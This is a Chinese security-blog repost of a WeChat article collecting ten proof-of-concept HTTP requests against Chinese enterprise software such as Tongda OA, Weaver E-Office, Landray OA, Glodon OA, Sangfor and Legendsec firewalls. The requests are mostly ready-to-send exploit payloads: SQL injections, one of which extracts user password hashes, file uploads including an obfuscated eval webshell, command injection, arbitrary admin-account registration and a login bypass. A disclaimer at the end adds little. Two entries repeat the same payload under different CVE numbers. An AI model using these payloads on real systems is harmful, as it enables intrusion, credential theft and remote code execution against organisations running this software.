Hvv | 0day漏洞POC,嘘~

admin
admin
admin
103759
文章
87
评论
2023年8月12日11:13:52评论95 views字数 6825阅读22分45秒阅读模式
Hvv | 0day漏洞POC,嘘~

感谢师傅 · 关注我们

Hvv | 0day漏洞POC,嘘~

由于,微信公众号推送机制改变,现在需要设置为星标才能收到推送消息。大家就动动发财小手设置一下呗!啾咪~~~

Hvv | 0day漏洞POC,嘘~Hvv | 0day漏洞POC,嘘~

纯技术交流群(blacklove备注进群杜绝一切形式广告群哦!),想加在菜单栏。

0x01 通达OA sql注入漏洞(CVE-2023-4166 )


GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

0x02 泛微E-Office9文件上传漏洞(CVE-2023-2648 )


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.233.10:8082User-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

0x03 蓝凌OA前台任意代码执行漏洞

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: www.ynjd.cn:801User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-AliveContent-Length: 42Content-Type: application/x-www-form-urlencodedvar={"body":{"file":"file:///etc/passwd"}}

0X04 汉得SRM tomcat.jsp 登录绕过漏洞

/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1
然后访问后台:/main.screen

0x05 广联达OA SQL注入漏洞


POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

0x06 广联达OA 后台文件上传漏洞

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie: Connection: closeContent-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

0x07 明御运维审计与风险控制系统堡垒机任意用户注册

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1Host: xxxCookie: LANG=zh;USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1121
<?xmlversion="1.0"?><methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>XX.XX.XX.XX</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>deptadmin</string></value></member><member><name>name</name><value><string>deptadmin</string></value></member><member><name>pwd</name><value><string>Deptadmin@123</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>101</string></value></member></struct></value></param></params></methodCall>

0x08 深信服应用交付系统命令执行漏洞

POST /rep/loginHost:10.10.10.1:85
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

0x09 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 

POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"
10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"
obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--
马儿路径:attachements/xxx.php

0x10 泛微E-Office9文件上传漏洞(CVE-2023-2523)

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.233.10:8082User-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

上述漏洞POC已全部整理成文档,公众号后台回复"20230812"即可领取!


往期推荐

【工具分享】一款内网探测工具

HVV前夕,速查12个最常被利用的漏洞

【工具分享】渗透利器 ClassHound

批量运营CodeQL Cli扫描结果(简易版)

Xray捡洞中的高频漏洞

【工具分享】针对常见网络摄像头的漏洞扫描工具

如何给Kali linux的BurpSuite专业版设置快捷方式

网站加密传输场景下的通用漏扫思路

一个多功能红队武器库平台

干货 | 常见的API接口漏洞总结


声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果






点击左侧关注我们
关键字:资源
资源页面不定时更新资源
【免责声明版权归原作者,如有侵权,请联系我们进行删除或与您共商解决,感谢阅读

Hvv | 0day漏洞POC,嘘~
点分享
Hvv | 0day漏洞POC,嘘~
点收藏
Hvv | 0day漏洞POC,嘘~
点点赞
Hvv | 0day漏洞POC,嘘~
点在看


原文始发于微信公众号(黑客白帽子):Hvv | 0day漏洞POC,嘘~

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月12日11:13:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hvv | 0day漏洞POC,嘘~https://cn-sec.com/archives/1952375.html

发表评论

匿名网友 填写信息